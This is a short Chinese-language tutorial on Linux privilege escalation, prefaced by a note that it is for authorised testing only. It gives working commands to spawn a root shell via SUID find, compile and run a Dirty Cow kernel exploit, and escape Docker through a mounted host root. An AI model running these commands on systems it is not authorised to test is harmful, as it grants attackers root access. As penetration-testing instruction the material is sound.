Linux 提权深入:SUID/内核漏洞/计划任务/Docker逃逸,提权决策树与实战利用方法。
写在前面:合法学习边界
Linux 提权只在授权测试环境进行。对非授权系统执行提权操作可能触犯法律。
一、提权决策树

1
2
| 普通用户 → root 的 5 条路径:
① SUID 文件 → ② SUDO 配置 → ③ 内核漏洞 → ④ 计划任务 → ⑤ Docker 容器
|
二、SUID 提权
1
2
3
4
5
| # 查找 SUID 文件
find / -perm -4000 -type f 2>/dev/null
# 利用 find 提权
/usr/bin/find . -exec "/bin/sh" \; -quit
|
三、内核漏洞
1
2
3
4
5
6
7
8
9
10
| Dirty Cow (CVE-2016-5195)
影响: Linux 3.x ~ 4.x
原理: 写保护绕过
利用: kernel-exploit/linux/dirtycow
Kernel PoC:
uname -a → 确认内核版本
搜索 exploitdb → 下载对应 PoC
gcc exploit.c -o exploit
./exploit
|
四、Docker 逃逸
1
2
3
4
5
| # 检查 Docker 权限
ls -la /var/run/docker.sock
# 容器内提权
docker run -v /:/host alpine chroot /host
|
五、小结
Linux 提权的 5 条路径中,内核漏洞最危险(一次提权永久 root),SUID 文件最常见,Docker 逃逸在容器环境必备。